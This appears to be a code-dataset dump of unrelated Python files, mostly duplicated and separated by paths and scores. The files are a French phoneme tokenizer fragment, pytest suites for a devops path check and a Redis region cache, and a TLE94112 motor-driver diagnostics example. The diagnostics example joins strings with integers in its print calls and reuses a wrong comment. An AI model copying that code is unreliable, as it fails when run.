len(decoupe) > 0: # decoupe est reduite a mesure que tokens se remplit p = len(decoupe) if decoupe[0][0] == '-': # si le premier caractere est un trait d'union, on l'enleve decoupe[0] = decoupe[0][1:] element = "".join(decoupe) # on forme un mot avec les elements element_know = (element in self.ortho_unique) or (element in self.ortho_multiple) while not element_know and p > 1: # le nombre d'elements diminue jusqu'a ce qu'un mot connu apparaisse p -= 1 element = "".join(decoupe[:p]) element_know = (element in self.ortho_unique) or (element in self.ortho_multiple) tokens.append(element) decoupe = decoupe[p:] # on eleve de decoupe les parties tokenisees return tokens def tokenizer(self, phrase): """ Tokeniseur maison qui sépare autour des espaces et les appostophes des mots plus courts que deux chars :param phrase :return: phrase tokenisee """ # minuscules phrase = phrase.lower() # oe et ae phrase = phrase.replace("œ", "oe") phrase = phrase.replace("æ", "ae") # appostrophes phrase = phrase.replace("’", "'") # regex tokens = self.regex_lecteur(phrase, trad_numbers=True) # appostrophes/traits-d'unions i = 0 while i < len(tokens): tok = tokens[i] if any(appostrophe_ou_trait in tok for appostrophe_ou_trait in ['-', "'"]) and len(tok) > 1: tokens.pop(i) tokens_to_add = self.tirets_appostrophes(tok) for token_to_add in tokens_to_add: tokens.insert(i, token_to_add) i += 1 else: i += 1 # nombres for i, tok in enumerate(tokens): if tok.isdigit(): tokens[i] = tradn(int(tok)) phrase = " ".join(tokens) tokens = self.regex_lecteur(phrase, trad_numbers=False) return tokens def tokenizer_poem(self, poem): print(self.count_lecture) self.count_lecture += 1 poem_tokens = list() for strophe in poem: strophe_tokens = list() for ver in strophe: ver_tokens = self.tokenizer(ver) strophe_tokens.append(ver_tokens) poem_tokens.append(strophe_tokens) return poem_tokens def lire_nn(self, mots): # one hot m = len(mots) n_l = len(self.l2idx) x = np.zeros((m, self.tx + 1, n_l)) for i, mot in enumerate(mots): mot = str(mot) mot = "{m}{b}".format(m=mot, b=self.blank * (self.tx + 1 - len(mot))) lettres = [self.l2idx[lettre] for lettre in mot] for j, lettre in enumerate(lettres): x[i, j, lettre] = 1 # predictions h0 = np.zeros((m, self.n_h1)) c0 = np.zeros((m, self.n_h1)) y = self.net.predict(x=[x, c0, h0]) # dictionnaire indices vers phoneme idx2p = dict() for p, idx in self.p2idx.items(): idx2p[idx] = p # conversion one hot vers mots n_p = len(self.p2idx) pron_int = np.zeros((m, n_p, self.ty + 1)) for i in range(self.ty + 1): pron_int[:, :, i] = y[i] pron_int = pron_int.argmax(axis=1) # one hot vers indices phonemes # creation dico prononciation = dict() for i, mot in enumerate(mots): prononciation_mot = "" for idx in pron_int[i, :].tolist(): prononciation_mot = "{phons}{p}".format(phons=prononciation_mot, p=idx2p[idx]).replace(self.blank, "") prononciation[mot] = prononciation_mot return prononciation def lire_mots(self, mots): # dicos mots_unique = set() mots_multiples = set() mots_nn = set() pos_mots = pos_tag(mots) dico_nn = 0 for mot in mots: if mot in self.ortho_unique: mots_unique.update([mot]) elif mot in self.ortho_multiple: mots_multiples.update([mot]) else: mots_nn.update([mot]) if len(mots_multiples) > 0: for m, p in pos_mots: if m in mots_multiples and (m, p) not in self.dico_multiple.keys(): mots_multiples.remove(m) mots_nn.update([m]) if len(mots_nn) > 0: dico_nn = self.lire_nn(mots_nn) prononciation = list() for i, mot in enumerate(mots): prononciation_mot = "" if mot in mots_unique: prononciation_mot = self.dico_unique[mot] elif mot in mots_multiples: prononciation_mot = self.dico_multiple[pos_mots[i]] elif mot in mots_nn: prononciation_mot = dico_nn[mot] prononciation.append(prononciation_mot) return prononciation def lire_vers(self, vers, count=False): """ Lit un vers :param vers: Chaine de caracteres du vers :param count: Si l'on souhaite compter le nombre de vers que l'on lit :return: vers lu sous la forme d'une string de phonemes non espaces """ if count: print(self.count_lecture) self.count_lecture += 1 tokens = self.tokenizer(vers) pos = pos_tag(tokens) mots_lus = self.lire_mots(tokens) mots_lus_avec_e = e_final_tokens(tokens, mots_lus, pos, vers) mots_lus_liaisons = liaisons_tokens(tokens, mots_lus_avec_e, pos, vers) vers_lu = "".join(mots_lus_liaisons) return vers_lu def lire_strophe(self, strophe, ponctuation=None): if ponctuation is None: ponctuation = ['.', ',', '!', '?', "…"] # separation en phrases text_strophe = " ".join(strophe) reg0 = "".join(ponctuation) reg0 = "(?:(?![{caracteres_a_eviter}]).)+".format(caracteres_a_eviter=reg0) phrases_strophe = [phrase for phrase in RegexpTokenizer(reg0).tokenize(text_strophe) if len(phrase) > 0] # lecture des phrases phrases_lues = list() pos_phrases = list() for phrase in phrases_strophe: tokens_phrase = self.tokenizer(phrase) phrases_lues.extend(self.lire_mots(tokens_phrase)) pos_phrases.extend(pos_tag(tokens_phrase)) return phrases_lues, pos_phrases def lire_poem(self, poem_tokens, poem_text): print(self.count_lecture) self.count_lecture += 1 poem_phonemes_tokens = list() assert len(poem_tokens) == len(poem_text), "Les listes de textes et des tokens ont des longueurs differentes" for idx_s, strophe in enumerate(poem_tokens): strophe_text = poem_text[idx_s] strophe_phonemes_tokens = list() pos_strophe = list() phrase_a_lire = list() for ver_tokens in strophe: n_tok_ver = len(ver_tokens) phrase_a_lire.extend(ver_tokens) strophe_phonemes_tokens.append(n_tok_ver * ['']) pos_strophe.append(n_tok_ver * ['']) phrase_lue = self.lire_mots(phrase_a_lire) pos_phrase = pos_tag(phrase_a_lire) i = 0 j = 0 for idx, phoneme_mot in enumerate(phrase_lue): while len(strophe_phonemes_tokens[j]) == 0: strophe_phonemes_tokens[j] = "" pos_strophe[j] = [] i = 0 j += 1 strophe_phonemes_tokens[j][i] = phoneme_mot pos_strophe[j][i] = pos_phrase[idx] i += 1 if i == len(strophe_phonemes_tokens[j]): i = 0 j += 1 for idx in range(len(strophe_phonemes_tokens)): if len(strophe_phonemes_tokens[idx]) > 1: strophe_phonemes_tokens[idx] = e_final_tokens(strophe[idx], strophe_phonemes_tokens[idx], pos_strophe[idx], strophe_text[idx]) strophe_phonemes_tokens[idx] = liaisons_tokens(strophe[idx], strophe_phonemes_tokens[idx], pos_strophe[idx], strophe_text[idx]) strophe_phonemes_tokens[idx] = "".join(strophe_phonemes_tokens[idx]) if strophe_phonemes_tokens == [[]]: strophe_phonemes_tokens = [''] poem_phonemes_tokens.append(strophe_phonemes_tokens) return poem_phonemes_tokens def evaluate_model_from_lists(self, liste, batch_size=256): """ Mesure la performance d'un modele sur une liste de donnees :param liste: donnees sous forme de liste sur lesquelles evaluer le modele :param batch_size: taille du batch pour calculer les performances """ x, y_inv = self.one_hot_from_list(liste) y = list(y_inv.swapaxes(0, 1)) h0 = csr_matrix((x.shape[0], self.n_h1)) c0 = csr_matrix((x.shape[0], self.n_h1)) results = self.net.evaluate([x, c0, h0], y, batch_size=batch_size) print('loss:', results[0]) for i in range(0, self.ty): print('acc char {}:'.format(i), results[i + self.ty + 2]) def mispredicted(self, t_l, batch_size=256): unique_couples = list(set(t_l)) # recuperation des elements uniques missed = list() # liste des éléments mal predits x, y = self.one_hot_from_list(data=unique_couples) m = x.shape[0] y_a = y.argmax(axis=2) print(y_a.shape) c0 = csr_matrix((m, self.n_h1)) h0 = csr_matrix((m, self.n_h1)) y_hat_list = self.net.predict(x=[x, c0, h0], batch_size=batch_size) pred_phon = list() # dictionnaire indice vers phoneme idx2p = dict() for p, idx in self.p2idx.items(): idx2p[idx] = p for i in range(self.ty + 1): mat_yi_hat = y_hat_list[i].argmax(axis=1).reshape((m, 1)) pred_phon.append(mat_yi_hat) y_hat_a = np.concatenate(pred_phon, axis=1) # tranformation des mauvaises predictions en mots for i in range(m): bonne_prediction = pd.Series(y_hat_a[i, :] == y_a[i, :]).all() if not bonne_prediction: vecteur_predit = y_hat_a[i, :].tolist() prononciation_predite = "".join([idx2p[idx] for idx in vecteur_predit]).replace(self.blank, "") missed.append([unique_couples[i][0], unique_couples[i][1], prononciation_predite]) return missed def save(self, path): self.net.save(path) if __name__ == "lecture": os.environ['JAVAHOME'] = r"C:\Program Files (x86)\Java\jre1.8.0_261\bin\java.exe"
0.569613
0.448185
import logging import pathlib import tempfile import pytest from foodx_devops_tools.pipeline_config import PipelineConfiguration from foodx_devops_tools.pipeline_config._checks import ( _file_exists, do_path_check, ) from tests.ci.support.pipeline_config import MOCK_PATHS, MOCK_SECRET log = logging.getLogger(__name__) @pytest.fixture() def mock_file_exists(mock_async_method, mock_verify_puff_target): def _apply(return_value=None, side_effect=None): mock_async_method( "foodx_devops_tools.pipeline_config._checks._file_exists", return_value=return_value, side_effect=side_effect, ) return _apply @pytest.fixture() def path_check_mocks( mock_apply_template, mock_loads, mock_results, mock_run_puff_check, mock_file_exists, ): def _apply(return_value=None, side_effect=None): mock_file_exists(return_value=return_value, side_effect=side_effect) mock_loads(mock_results) mock_config = PipelineConfiguration.from_files(MOCK_PATHS, MOCK_SECRET) return mock_config return _apply class TestFileExists: @pytest.mark.asyncio async def test_true(self): with tempfile.TemporaryDirectory() as dir: this_dir = pathlib.Path(dir) this_file = this_dir / "exists" with this_file.open(mode="w") as f: f.write("") assert await _file_exists(this_file) @pytest.mark.asyncio async def test_false(self): with tempfile.TemporaryDirectory() as dir: this_dir = pathlib.Path(dir) this_file = this_dir / "notexists" assert not this_file.is_file() assert not await _file_exists(this_file) class TestDoPathCheck: @pytest.mark.asyncio async def test_clean(self, path_check_mocks): mock_config = path_check_mocks(return_value=True) await do_path_check(mock_config) @pytest.mark.asyncio async def test_missing_file(self, path_check_mocks): mock_config = path_check_mocks( side_effect=[True, False, True, True, True] ) with pytest.raises( FileNotFoundError, match=r"files missing from deployment" ): await do_path_check(mock_config) @pytest.mark.asyncio async def test_multiple_missing_files(self, path_check_mocks): mock_config = path_check_mocks( side_effect=[False, False, False, False, False] ) with pytest.raises( FileNotFoundError, match=r"files missing from deployment" ): await do_path_check(mock_config) @pytest.mark.asyncio async def test_failed_check( self, path_check_mocks, mocker, ): mocker.patch( "foodx_devops_tools.pipeline_config._checks._check_arm_files", side_effect=RuntimeError(), ) mock_config = path_check_mocks(return_value=True) with pytest.raises(RuntimeError): await do_path_check(mock_config)
tests/ci/unit_tests/pipeline_config/test_checks.py
import logging import pathlib import tempfile import pytest from foodx_devops_tools.pipeline_config import PipelineConfiguration from foodx_devops_tools.pipeline_config._checks import ( _file_exists, do_path_check, ) from tests.ci.support.pipeline_config import MOCK_PATHS, MOCK_SECRET log = logging.getLogger(__name__) @pytest.fixture() def mock_file_exists(mock_async_method, mock_verify_puff_target): def _apply(return_value=None, side_effect=None): mock_async_method( "foodx_devops_tools.pipeline_config._checks._file_exists", return_value=return_value, side_effect=side_effect, ) return _apply @pytest.fixture() def path_check_mocks( mock_apply_template, mock_loads, mock_results, mock_run_puff_check, mock_file_exists, ): def _apply(return_value=None, side_effect=None): mock_file_exists(return_value=return_value, side_effect=side_effect) mock_loads(mock_results) mock_config = PipelineConfiguration.from_files(MOCK_PATHS, MOCK_SECRET) return mock_config return _apply class TestFileExists: @pytest.mark.asyncio async def test_true(self): with tempfile.TemporaryDirectory() as dir: this_dir = pathlib.Path(dir) this_file = this_dir / "exists" with this_file.open(mode="w") as f: f.write("") assert await _file_exists(this_file) @pytest.mark.asyncio async def test_false(self): with tempfile.TemporaryDirectory() as dir: this_dir = pathlib.Path(dir) this_file = this_dir / "notexists" assert not this_file.is_file() assert not await _file_exists(this_file) class TestDoPathCheck: @pytest.mark.asyncio async def test_clean(self, path_check_mocks): mock_config = path_check_mocks(return_value=True) await do_path_check(mock_config) @pytest.mark.asyncio async def test_missing_file(self, path_check_mocks): mock_config = path_check_mocks( side_effect=[True, False, True, True, True] ) with pytest.raises( FileNotFoundError, match=r"files missing from deployment" ): await do_path_check(mock_config) @pytest.mark.asyncio async def test_multiple_missing_files(self, path_check_mocks): mock_config = path_check_mocks( side_effect=[False, False, False, False, False] ) with pytest.raises( FileNotFoundError, match=r"files missing from deployment" ): await do_path_check(mock_config) @pytest.mark.asyncio async def test_failed_check( self, path_check_mocks, mocker, ): mocker.patch( "foodx_devops_tools.pipeline_config._checks._check_arm_files", side_effect=RuntimeError(), ) mock_config = path_check_mocks(return_value=True) with pytest.raises(RuntimeError): await do_path_check(mock_config)
0.472197
0.241311
import multi_half_bridge_py as mhb from time import sleep # Tle94112 Object on Shield 1 controller = mhb.Tle94112Rpi() # Tle94112motor Objects on controller motor = mhb.Tle94112Motor(controller) # Enable motorController on all Shields and motors # Note: Required to be done before starting to configure the motor # controller is set to default CS0 pin controller.begin() # Connect a motor to HB1 high-side and HB5 low-side # With two combined half bridges the motor can have up to 1.8 A motor.initConnector(motor.HIGHSIDE, controller.TLE_NOPWM, controller.TLE_HB1, controller.TLE_NOHB, controller.TLE_NOHB, controller.TLE_NOHB) motor.initConnector(motor.LOWSIDE, controller.TLE_NOPWM, controller.TLE_HB5, controller.TLE_NOHB, controller.TLE_NOHB, controller.TLE_NOHB) # Start the motor controller motor.begin() # Run the motor motor.start(255) # Clear all errors to start clean controller.clearErrors() print("Motor active, starting loop.\n") while 1: # Communicate with TLE94112 to get the status register SYS_DIAG1 (default) status = controller.getSysDiagnosis() # The SPI error flag shows if a SPI protocol # error is detected. if (status & controller.TLE_SPI_ERROR): print("SPI error detected!") # Handle errors '''The under voltage flag shows if a supply voltage below the lower limit is detected. All outputs are disabled when flag is set. This error is latched and needs to be cleared manually. ''' if (status & controller.TLE_UNDER_VOLTAGE): print("Under voltage detected!") # Handle the under voltage error here. ''' The over voltage flag shows if a supply voltage above the upper limit is detected. All outputs are disabled when flag is set. This error is latched and needs to be cleared manually. ''' if (status & controller.TLE_OVER_VOLTAGE): print("Over voltage detected!") # Handle the over voltage error here. ''' The over voltage flag shows if a supply voltage above the upper limit is detected. All outputs are disabled when flag is set. This error is latched and needs to be cleared manually. ''' if (status & controller.TLE_POWER_ON_RESET): print("Power on reset detected!") # Handle the power on reset here. ''' The pre-warning temperature flag shows that the junction temperature exceeded the temperature pre-warning threshold. This error is latched and needs to be cleared manually. ''' if (status & controller.TLE_TEMP_WARNING): print("Junction temperature above pre-warning threshold!") # Handle the temperature warning here. ''' The shutdown temperature flag shows that the junction temperature exceeded the shutdown temperature threshold. All outputs are disabled when flag is set. This error is latched and needs to be cleared manually. ''' if (status & controller.TLE_TEMP_SHUTDOWN): print("Junction temperature above shutdown threshold!") # Handle the temperature shutdown here. ''' The load error flag shows that either: - an open load error or - an over-current error is detected on at least one output. The faulty output is disabled in case of an over-current error. This error is latched and needs to be cleared manually. ''' if (status & controller.TLE_LOAD_ERROR): print("Load error detected!") # Handle the Load error here. ''' A load error can be specified more precisely. The chip knows which kind of error occurred in which half-bridge. This can be red as follows: ''' # For each half bridge (0 is placeholder for no half bridge) for halfBridge in range(1,13): if (halfBridge==1): hb_val = controller.TLE_HB1 if (halfBridge==2): hb_val = controller.TLE_HB2 if (halfBridge==3): hb_val = controller.TLE_HB3 if (halfBridge==4): hb_val = controller.TLE_HB4 if (halfBridge==5): hb_val = controller.TLE_HB5 if (halfBridge==6): hb_val = controller.TLE_HB6 if (halfBridge==7): hb_val = controller.TLE_HB7 if (halfBridge==8): hb_val = controller.TLE_HB8 if (halfBridge==9): hb_val = controller.TLE_HB9 if (halfBridge==10): hb_val = controller.TLE_HB10 if (halfBridge==11): hb_val = controller.TLE_HB11 if (halfBridge==12): hb_val = controller.TLE_HB12 # Read over-current status of this half bridge from chip oc = controller.getHBOverCurrent(hb_val) # Check for an over-current error on the low-side of this half bridge if (oc & controller.TLE_LOWSIDE): print("\tHB" + hb_val + "\tOver-current detected in low-side switch." + halfBridge) # Check for an over-current error on the high-side of this half bridge if (oc & controller.TLE_HIGHSIDE): print("\tHB" + hb_val + "\tOver-current detected in high-side switch." + halfBridge) # Read open load status of this half bridge from chip ol = controller.getHBOpenLoad(hb_val) # Check for an open load error in this half bridge if (ol): print("\tHB" + hb_val + "\tOpen load detected." + halfBridge) # If no error was found print a heartbeat message if (status==0): print("All seems fine :-)") print("\n---\n") # Clear all error flags (will clear latched errors if they do not persist) controller.clearErrors() # Wait for 5 seconds sleep(5)
src/framework/raspberrypi/examples_py/errorDiagnosis.py
import multi_half_bridge_py as mhb from time import sleep # Tle94112 Object on Shield 1 controller = mhb.Tle94112Rpi() # Tle94112motor Objects on controller motor = mhb.Tle94112Motor(controller) # Enable motorController on all Shields and motors # Note: Required to be done before starting to configure the motor # controller is set to default CS0 pin controller.begin() # Connect a motor to HB1 high-side and HB5 low-side # With two combined half bridges the motor can have up to 1.8 A motor.initConnector(motor.HIGHSIDE, controller.TLE_NOPWM, controller.TLE_HB1, controller.TLE_NOHB, controller.TLE_NOHB, controller.TLE_NOHB) motor.initConnector(motor.LOWSIDE, controller.TLE_NOPWM, controller.TLE_HB5, controller.TLE_NOHB, controller.TLE_NOHB, controller.TLE_NOHB) # Start the motor controller motor.begin() # Run the motor motor.start(255) # Clear all errors to start clean controller.clearErrors() print("Motor active, starting loop.\n") while 1: # Communicate with TLE94112 to get the status register SYS_DIAG1 (default) status = controller.getSysDiagnosis() # The SPI error flag shows if a SPI protocol # error is detected. if (status & controller.TLE_SPI_ERROR): print("SPI error detected!") # Handle errors '''The under voltage flag shows if a supply voltage below the lower limit is detected. All outputs are disabled when flag is set. This error is latched and needs to be cleared manually. ''' if (status & controller.TLE_UNDER_VOLTAGE): print("Under voltage detected!") # Handle the under voltage error here. ''' The over voltage flag shows if a supply voltage above the upper limit is detected. All outputs are disabled when flag is set. This error is latched and needs to be cleared manually. ''' if (status & controller.TLE_OVER_VOLTAGE): print("Over voltage detected!") # Handle the over voltage error here. ''' The over voltage flag shows if a supply voltage above the upper limit is detected. All outputs are disabled when flag is set. This error is latched and needs to be cleared manually. ''' if (status & controller.TLE_POWER_ON_RESET): print("Power on reset detected!") # Handle the power on reset here. ''' The pre-warning temperature flag shows that the junction temperature exceeded the temperature pre-warning threshold. This error is latched and needs to be cleared manually. ''' if (status & controller.TLE_TEMP_WARNING): print("Junction temperature above pre-warning threshold!") # Handle the temperature warning here. ''' The shutdown temperature flag shows that the junction temperature exceeded the shutdown temperature threshold. All outputs are disabled when flag is set. This error is latched and needs to be cleared manually. ''' if (status & controller.TLE_TEMP_SHUTDOWN): print("Junction temperature above shutdown threshold!") # Handle the temperature shutdown here. ''' The load error flag shows that either: - an open load error or - an over-current error is detected on at least one output. The faulty output is disabled in case of an over-current error. This error is latched and needs to be cleared manually. ''' if (status & controller.TLE_LOAD_ERROR): print("Load error detected!") # Handle the Load error here. ''' A load error can be specified more precisely. The chip knows which kind of error occurred in which half-bridge. This can be red as follows: ''' # For each half bridge (0 is placeholder for no half bridge) for halfBridge in range(1,13): if (halfBridge==1): hb_val = controller.TLE_HB1 if (halfBridge==2): hb_val = controller.TLE_HB2 if (halfBridge==3): hb_val = controller.TLE_HB3 if (halfBridge==4): hb_val = controller.TLE_HB4 if (halfBridge==5): hb_val = controller.TLE_HB5 if (halfBridge==6): hb_val = controller.TLE_HB6 if (halfBridge==7): hb_val = controller.TLE_HB7 if (halfBridge==8): hb_val = controller.TLE_HB8 if (halfBridge==9): hb_val = controller.TLE_HB9 if (halfBridge==10): hb_val = controller.TLE_HB10 if (halfBridge==11): hb_val = controller.TLE_HB11 if (halfBridge==12): hb_val = controller.TLE_HB12 # Read over-current status of this half bridge from chip oc = controller.getHBOverCurrent(hb_val) # Check for an over-current error on the low-side of this half bridge if (oc & controller.TLE_LOWSIDE): print("\tHB" + hb_val + "\tOver-current detected in low-side switch." + halfBridge) # Check for an over-current error on the high-side of this half bridge if (oc & controller.TLE_HIGHSIDE): print("\tHB" + hb_val + "\tOver-current detected in high-side switch." + halfBridge) # Read open load status of this half bridge from chip ol = controller.getHBOpenLoad(hb_val) # Check for an open load error in this half bridge if (ol): print("\tHB" + hb_val + "\tOpen load detected." + halfBridge) # If no error was found print a heartbeat message if (status==0): print("All seems fine :-)") print("\n---\n") # Clear all error flags (will clear latched errors if they do not persist) controller.clearErrors() # Wait for 5 seconds sleep(5)
0.45423
0.336808
import pytest from collections import namedtuple from region_cache import RegionCache @pytest.fixture(params=[ {'REGION_CACHE_URL': 'redis://localhost:6379/5'}, { 'REGION_CACHE_URL': 'redis://localhost:6379/5', 'REGION_CACHE_RR_URL': 'redis://localhost:6379/5' }, { 'REGION_CACHE_HOST': 'localhost', 'REGION_CACHE_PORT': 6379, 'REGION_CACHE_DB': 5, 'REGION_CACHE_RR_HOST': 'localhost', 'REGION_CACHE_RR_PORT': 6379 }, { 'REGION_CACHE_HOST': 'localhost', 'REGION_CACHE_PORT': 6379, 'REGION_CACHE_DB': 5, 'REGION_CACHE_OP_TIMEOUT': 0.5 }, { 'REGION_CACHE_HOST': 'localhost', 'REGION_CACHE_PORT': 6379, 'REGION_CACHE_DB': 5, 'REGION_CACHE_OP_TIMEOUT': 0.5, 'REGION_CACHE_OP_TIMEOUT_RAISE': False, 'REGION_CACHE_OP_TIMEOUT_RECONNECT': True, 'REGION_CACHE_REDIS_OPTIONS': { 'max_connections': 3 } } ]) def app(request): return namedtuple('app', ['config'])(config=request.param) @pytest.fixture() def region_cache(app): c = RegionCache() c.init_app(app) c.conn.flushall() yield c c.conn.flushall() @pytest.fixture() def region(region_cache): r = region_cache.region('example_region') yield r r.invalidate() @pytest.fixture() def region_with_timeout(region_cache): r = region_cache.region('timed_region', timeout=2) yield r r.invalidate() def test_init_app(app): c = RegionCache() c.init_app(app) assert c.conn assert c.conn.ping() assert c._root assert c._root_name in c._regions assert c._regions[c._root_name] is c._root assert len(c._regions) == 1 def test_subregions(region_cache): r = region_cache.region('abc.xyz') assert '{region_cache._root_name}.abc'.format(region_cache=region_cache) in region_cache._regions assert '{region_cache._root_name}.abc.xyz'.format(region_cache=region_cache) in region_cache._regions assert 'abc.xyz' not in region_cache._regions assert 'xyz' not in region_cache._regions r1 = region_cache.region('xml', timeout=60) assert r1._timeout == 60 r2 = r1.region('json') assert r2._timeout == 60 def test_region_context_manager(region): with region as r: r['key1'] = 0 r['key2'] = 1 assert 'key1' in region assert 'key2' in region assert region._region_cache.conn.hget(region.name, 'key1') is not None assert region._region_cache.conn.hget(region.name, 'key2') is not None def test_invalidate(region): region['key'] = 'value' region.invalidate() assert 'key' not in region assert region._region_cache.conn.hget(region.name, 'key') is None sb = region.region('sub') sb['key2'] = 'value' region.invalidate() assert region._region_cache.conn.hget(sb.name, 'key2') is None assert 'key2' not in sb def test_invalidate_region(region_cache, region): region['key'] = 'value' region_cache.region('root').invalidate() assert 'key' not in region assert region._region_cache.conn.hget(region.name, 'key') is None sb = region.region('sub') sb['key2'] = 'value' region.invalidate() assert region._region_cache.conn.hget(sb.name, 'key2') is None assert 'key2' not in sb def test_items(region): region['foo'] = 'bar' assert region['foo'] == 'bar' assert region._region_cache.conn.hget(region.name, 'foo') is not None del region['foo'] assert pytest.raises(KeyError, lambda: region['foo']) def test_children(region): sb = region.region('sub') assert sb in list(region.children()) def test_iter(region, region_cache): region['foo'] = 'bar' assert [x for x in region] region.invalidate() def test_invalidate_on(region): import blinker s = blinker.signal('named_signal') t = blinker.signal('other_signal') region['key'] = 'value' region.invalidate_on(s, t) s.send('nothing',in_='particular') assert 'key' not in region assert region._region_cache.conn.hget(region.name, 'key') is None region['key'] = 'value' t.send('nothing', in_='particular') assert 'key' not in region assert region._region_cache.conn.hget(region.name, 'key') is None def test_cached(region): called = [0] @region.cached def foobar(k, x=None): called[0] += 1 return k foobar(1) assert called[0] == 1 foobar(1) assert called[0] == 1 def test_get_or_compute(region): x = region.get_or_compute('computed_key', 0) assert 'computed_key' in region assert region['computed_key'] == 0 assert x == 0 y = region.get_or_compute('computed_key2', lambda: 200) assert y == 200 assert 'computed_key2' in region assert region['computed_key2'] == 200 def test_invalidate_connections(region_cache): region_cache.invalidate_connections() assert region_cache._w_conn is None assert region_cache._r_conn is None def test_reconnect_backoff(region, region_cache): region['key1'] = 0 region['key2'] = 1 region_cache._reconnect_backoff = 5 # 5 second backoff before trying to reconnect region_cache.invalidate_connections() assert region_cache.is_disconnected() with pytest.raises(KeyError): region['key1'] assert region_cache._w_conn is None assert region_cache._r_conn is None def test_timeout_with_context(region_with_timeout): with region_with_timeout as r: r['key1'] = 0 r['key2'] = 1 assert region_with_timeout._region_cache.conn.hget(region_with_timeout.name, 'key1') is not None assert region_with_timeout._region_cache.conn.hget(region_with_timeout.name, 'key2') is not None assert region_with_timeout._region_cache.conn.ttl(region_with_timeout.name) > 0 assert 'key1' in region_with_timeout assert 'key2' in region_with_timeout import time time.sleep(1) assert region_with_timeout._region_cache.conn.ttl(region_with_timeout.name) > 0 assert region_with_timeout._region_cache.conn.hget(region_with_timeout.name, 'key1') is not None assert region_with_timeout._region_cache.conn.hget(region_with_timeout.name, 'key2') is not None assert 'key1' in region_with_timeout assert 'key2' in region_with_timeout time.sleep(1.5) assert region_with_timeout._region_cache.conn.ttl(region_with_timeout.name) == -2 assert 'key1' not in region_with_timeout assert 'key2' not in region_with_timeout def test_timeout(region_with_timeout): region_with_timeout['key1'] = 0 region_with_timeout['key2'] = 1 assert region_with_timeout._region_cache.conn.hget(region_with_timeout.name, 'key1') is not None assert region_with_timeout._region_cache.conn.hget(region_with_timeout.name, 'key2') is not None assert region_with_timeout._region_cache.conn.ttl(region_with_timeout.name) > 0 assert 'key1' in region_with_timeout assert 'key2' in region_with_timeout import time time.sleep(1) assert region_with_timeout._region_cache.conn.ttl(region_with_timeout.name) > 0 assert region_with_timeout._region_cache.conn.hget(region_with_timeout.name, 'key1') is not None assert region_with_timeout._region_cache.conn.hget(region_with_timeout.name, 'key2') is not None assert 'key1' in region_with_timeout assert 'key2' in region_with_timeout time.sleep(1.5) assert region_with_timeout._region_cache.conn.ttl(region_with_timeout.name) == -2 assert 'key1' not in region_with_timeout assert 'key2' not in region_with_timeout # make sure we can recreate the region. region_with_timeout['key1'] = 0 region_with_timeout['key2'] = 1 assert region_with_timeout._region_cache.conn.hget(region_with_timeout.name, 'key1') is not None assert region_with_timeout._region_cache.conn.hget(region_with_timeout.name, 'key2') is not None assert region_with_timeout._region_cache.conn.ttl(region_with_timeout.name) > 0 assert 'key1' in region_with_timeout assert 'key2' in region_with_timeout subregion = region_with_timeout.region("subregion") subregion['key1'] = 0 subregion['key2'] = 1 assert subregion._region_cache.conn.hget(subregion.name, 'key1') is not None assert subregion._region_cache.conn.hget(subregion.name, 'key2') is not None assert subregion._region_cache.conn.ttl(subregion.name) > 0 assert 'key1' in subregion assert 'key2' in subregion import time time.sleep(1) assert subregion._region_cache.conn.ttl(subregion.name) > 0 assert subregion._region_cache.conn.hget(subregion.name, 'key1') is not None assert subregion._region_cache.conn.hget(subregion.name, 'key2') is not None assert 'key1' in subregion assert 'key2' in subregion time.sleep(1.5) assert subregion._region_cache.conn.ttl(subregion.name) == -2 assert 'key1' not in subregion assert 'key2' not in subregion # make sure we can recreate the region. subregion['key1'] = 0 subregion['key2'] = 1 assert subregion._region_cache.conn.hget(subregion.name, 'key1') is not None assert subregion._region_cache.conn.hget(subregion.name, 'key2') is not None assert subregion._region_cache.conn.ttl(subregion.name) > 0 assert 'key1' in subregion assert 'key2' in subregion
tests/test_region_cache.py
import pytest from collections import namedtuple from region_cache import RegionCache @pytest.fixture(params=[ {'REGION_CACHE_URL': 'redis://localhost:6379/5'}, { 'REGION_CACHE_URL': 'redis://localhost:6379/5', 'REGION_CACHE_RR_URL': 'redis://localhost:6379/5' }, { 'REGION_CACHE_HOST': 'localhost', 'REGION_CACHE_PORT': 6379, 'REGION_CACHE_DB': 5, 'REGION_CACHE_RR_HOST': 'localhost', 'REGION_CACHE_RR_PORT': 6379 }, { 'REGION_CACHE_HOST': 'localhost', 'REGION_CACHE_PORT': 6379, 'REGION_CACHE_DB': 5, 'REGION_CACHE_OP_TIMEOUT': 0.5 }, { 'REGION_CACHE_HOST': 'localhost', 'REGION_CACHE_PORT': 6379, 'REGION_CACHE_DB': 5, 'REGION_CACHE_OP_TIMEOUT': 0.5, 'REGION_CACHE_OP_TIMEOUT_RAISE': False, 'REGION_CACHE_OP_TIMEOUT_RECONNECT': True, 'REGION_CACHE_REDIS_OPTIONS': { 'max_connections': 3 } } ]) def app(request): return namedtuple('app', ['config'])(config=request.param) @pytest.fixture() def region_cache(app): c = RegionCache() c.init_app(app) c.conn.flushall() yield c c.conn.flushall() @pytest.fixture() def region(region_cache): r = region_cache.region('example_region') yield r r.invalidate() @pytest.fixture() def region_with_timeout(region_cache): r = region_cache.region('timed_region', timeout=2) yield r r.invalidate() def test_init_app(app): c = RegionCache() c.init_app(app) assert c.conn assert c.conn.ping() assert c._root assert c._root_name in c._regions assert c._regions[c._root_name] is c._root assert len(c._regions) == 1 def test_subregions(region_cache): r = region_cache.region('abc.xyz') assert '{region_cache._root_name}.abc'.format(region_cache=region_cache) in region_cache._regions assert '{region_cache._root_name}.abc.xyz'.format(region_cache=region_cache) in region_cache._regions assert 'abc.xyz' not in region_cache._regions assert 'xyz' not in region_cache._regions r1 = region_cache.region('xml', timeout=60) assert r1._timeout == 60 r2 = r1.region('json') assert r2._timeout == 60 def test_region_context_manager(region): with region as r: r['key1'] = 0 r['key2'] = 1 assert 'key1' in region assert 'key2' in region assert region._region_cache.conn.hget(region.name, 'key1') is not None assert region._region_cache.conn.hget(region.name, 'key2') is not None def test_invalidate(region): region['key'] = 'value' region.invalidate() assert 'key' not in region assert region._region_cache.conn.hget(region.name, 'key') is None sb = region.region('sub') sb['key2'] = 'value' region.invalidate() assert region._region_cache.conn.hget(sb.name, 'key2') is None assert 'key2' not in sb def test_invalidate_region(region_cache, region): region['key'] = 'value' region_cache.region('root').invalidate() assert 'key' not in region assert region._region_cache.conn.hget(region.name, 'key') is None sb = region.region('sub') sb['key2'] = 'value' region.invalidate() assert region._region_cache.conn.hget(sb.name, 'key2') is None assert 'key2' not in sb def test_items(region): 